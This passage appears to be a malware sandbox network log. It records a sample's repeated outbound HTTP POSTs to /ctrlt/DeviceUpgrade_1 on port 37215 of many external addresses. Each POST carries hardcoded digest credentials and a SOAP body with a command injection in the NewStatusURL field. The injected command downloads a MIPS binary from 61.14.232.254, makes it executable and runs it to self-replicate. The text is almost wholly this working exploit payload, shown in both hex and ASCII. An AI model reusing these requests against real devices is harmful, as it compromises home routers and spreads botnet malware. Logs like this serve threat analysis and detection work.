                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1491192.168.2.1357002157.100.233.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575751066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1492192.168.2.134031441.60.79.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575773001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1493192.168.2.135952641.181.208.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575788975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1494192.168.2.1352478157.171.225.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575825930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1495192.168.2.1353194197.124.46.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575908899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1496192.168.2.134984285.97.167.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575999975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1497192.168.2.133628441.152.26.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.576028109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1498192.168.2.1337086157.244.169.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.576044083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1499192.168.2.135056641.187.84.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.576057911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1500192.168.2.134103241.240.17.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.576071024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 